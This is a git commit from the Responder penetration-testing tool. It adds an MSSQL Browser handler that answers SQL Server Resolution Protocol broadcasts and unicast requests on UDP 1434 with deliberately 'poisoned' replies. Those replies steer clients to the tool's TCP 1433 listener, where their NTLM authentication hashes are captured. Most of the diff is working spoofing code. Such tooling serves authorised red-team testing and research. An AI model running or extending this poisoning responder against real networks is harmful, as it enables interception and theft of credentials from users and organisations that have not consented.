Merge pull request #58 from megabug/mssql-browser

Add Microsoft SQL Server Browser responder
2025-08-20 21:33:31 -07:00 · 2017-07-15 13:23:08 -03:00 · 2017-07-15 13:23:08 -03:00 · 95c0d6e673
commit 95c0d6e673
parent 0436b47a2c bc90f8fe27
3 changed files with 33 additions and 2 deletions
--- a/README.md
+++ b/README.md
@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
 ## Considerations ##
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
+- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
 - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
--- a/Responder.py
+++ b/Responder.py
@ -268,8 +268,9 @@ def main():
 			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
 		if settings.Config.SQL_On_Off:
-			from servers.MSSQL import MSSQL
+			from servers.MSSQL import MSSQL, MSSQLBrowser
 			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
 			threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 1434, MSSQLBrowser,)))
 		if settings.Config.FTP_On_Off:
 			from servers.FTP import FTP
--- a/servers/MSSQL.py
+++ b/servers/MSSQL.py
@ -17,6 +17,7 @@
 from SocketServer import BaseRequestHandler
 from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
 from utils import *
 import random
 import struct
 class TDS_Login_Packet:
@ -149,3 +150,32 @@ class MSSQL(BaseRequestHandler):
 		except:
 			self.request.close()
                        pass
 # MSSQL Server Browser class
 # See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
 class MSSQLBrowser(BaseRequestHandler):
 	def handle(self):
 		if settings.Config.Verbose:
 			print text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0])
 		data, soc = self.request
 		if data:
 			if data[0] in "\x02\x03": # CLNT_BCAST_EX / CLNT_UCAST_EX
 				self.send_response(soc, "MSSQLSERVER")
 			elif data[0] == "\x04": # CLNT_UCAST_INST
 				self.send_response(soc, data[1:].rstrip("\x00"))
 			elif data[0] == "\x0F": # CLNT_UCAST_DAC
 				self.send_dac_response(soc)
 	def send_response(self, soc, inst):
 		print text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0])
 		server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
 		resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
 		soc.sendto(struct.pack("<BH", 0x05, len(resp)) + resp, self.client_address)
 	def send_dac_response(self, soc):
 		print text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0])
 		soc.sendto(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433), self.client_address)